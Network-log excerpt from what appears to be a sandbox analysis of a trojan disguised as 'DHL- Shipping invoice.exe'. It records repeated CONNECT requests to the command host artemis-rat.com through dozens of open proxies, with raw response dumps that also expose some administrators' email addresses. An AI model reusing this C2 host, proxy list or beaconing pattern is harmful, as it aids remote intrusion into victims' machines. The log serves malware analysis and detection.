65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 70 69 2e 67 72 6f 77 62 6f 74 2e 64 6b 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at maxleggieri@gmail.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.38 (Debian) Server at api.growbot.dk Port 80</address></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            201192.168.2.45057479.110.196.14580816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.593703032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            202192.168.2.450495203.74.125.1888886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.599584103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.898725033 CET536INHTTP/1.1 500 Internal Server Error
                            Server: nginx/1.25.0
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 579
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d
                            Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.25.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            203192.168.2.44980547.236.56.214806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.602396965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:35.491159916 CET735INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:37:35 GMT
                            Server: Apache
                            X-Frame-Options: SAMEORIGIN
                            Content-Length: 530
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 61 64 6d 69 6e 40 65 78 61 6d 70 6c 65 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@example.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            204192.168.2.450442106.105.218.244806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.603072882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            205192.168.2.45061379.110.201.23580816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.603868961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            206192.168.2.45068767.227.186.83563706484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.603986979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            207192.168.2.450689172.67.255.224806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.608704090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.695911884 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            208192.168.2.450661132.148.16.169113206484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.612493992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.046674967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.515407085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.452934027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.343895912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.319787025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.250257969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.140836954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.612930059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            209192.168.2.450698104.17.239.10806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.616297007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.704164028 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            210192.168.2.450701198.199.86.1180806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.619208097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.778700113 CET28INHTTP/1.1 400 Bad Request


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            211192.168.2.450705104.25.184.189806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.628618002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.716417074 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            212192.168.2.45069438.162.19.21231286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.629848957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.941082001 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            213192.168.2.450479216.137.184.253806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.636336088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.799603939 CET965INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Server: Apache
                            Strict-Transport-Security: max-age=63072000; includeSubDomains
                            X-Frame-Options: SAMEORIGIN
                            X-Content-Type-Options: nosniff
                            Content-Length: 663
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 72 6f 6f 74 40 73 65 72 76 65 72 2e 73 65 6e 61 2e 63 6c 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at root@server.sena.cl to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            214192.168.2.450656185.49.31.20780816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.638389111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            215192.168.2.45078241.86.252.914436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.641973972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            216192.168.2.45064845.11.95.16560456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.642142057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            217192.168.2.45078341.86.252.914436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.642838001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            218192.168.2.45078641.86.252.914436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.645510912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            219192.168.2.45078741.86.252.914436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.646178007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            220192.168.2.450578185.191.236.16231286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.666610003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.403413057 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            221192.168.2.450652200.41.148.2120006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.674571037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            222192.168.2.450549113.143.37.8290026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.701615095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.020601988 CET311INHTTP/1.1 400 Bad Request
                            Server: nginx
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            223192.168.2.450610203.222.24.36806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
